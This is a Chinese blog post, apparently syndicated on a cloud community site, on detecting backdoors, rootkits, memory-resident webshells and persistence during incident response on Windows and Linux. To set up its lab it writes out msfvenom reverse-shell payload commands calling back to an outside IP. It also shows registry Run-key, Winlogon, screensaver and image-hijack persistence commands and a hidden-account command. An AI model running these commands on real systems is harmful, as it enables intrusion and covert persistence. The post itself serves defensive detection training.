【应急响应】后门攻击检测指南&Rookit&内存马&权限维持&WIN&Linux
【应急响应】后门攻击检测指南&Rookit&内存马&权限维持&WIN&Linux
今天是几号
发布于 2024-07-18 15:37:42
发布于 2024-07-18 15:37:42
文章被收录于专栏:Cyber Security
Windows实验
1、常规MSF后门-分析检测 2、权限维持后门-分析检测 3、Web程序内存马-分析检测 常见工具集合: https://mp.weixin.qq.com/s/L3Lv06bFdUX_ZE4rS69aDg
常规后门: ==网络对外连接查看 ==
msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.xx.xx lport=6666 -f exe -o shell.exe使用火绒剑工具查看数字签名文件以及回连ip
在这里插入图片描述
自启动测试:
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "backdoor" /t REG_SZ /F /D "C:\shell.exe"
在这里插入图片描述
隐藏账户
net user whgojp$ whgojp!@#X123 /add
在这里插入图片描述
映像劫持
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe /c calc" #修改注册表
在这里插入图片描述
同样的使用火绒剑也可以检测到并清除
在这里插入图片描述
屏保&登录
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\shell.exe" /f #屏保
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\shell.exe" #远程登陆该计算机 启动shell
在这里插入图片描述
Linux实验
1、常规MSF后门-分析检测 2、Rootkit后门-分析检测 3、权限维持后门-分析检测 4、Web程序内存马-分析检测 https://mp.weixin.qq.com/s/L3Lv06bFdUX_ZE4rS69aDg
常规后门:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=47.94.xx.xx LPORT=7777 -f elf >shell.elf
在这里插入图片描述
Rootkit后门:GScan rkhunter
权限维持后门:GScan rkhunter
1、GScan Linux主机 https://github.com/grayddq/GScan python GScan.py
在这里插入图片描述
2、rkhunter
wget http://downloads.sourceforge.net/project/rkhunter/rkhunter/1.4.6/rkhunter-1.4.6.tar.gztar -xvf rkhunter-1.4.6.tar.gz cd rkhunter-1.4.6 ./installer.sh --layout default --install rkhunter -c
在这里插入图片描述
Web层面:通用系统层面
在这里插入图片描述
1、常规后门 2、内存马(无文件马) PHP 进程马 .NET JAVA Python ……
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2024-07-03,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
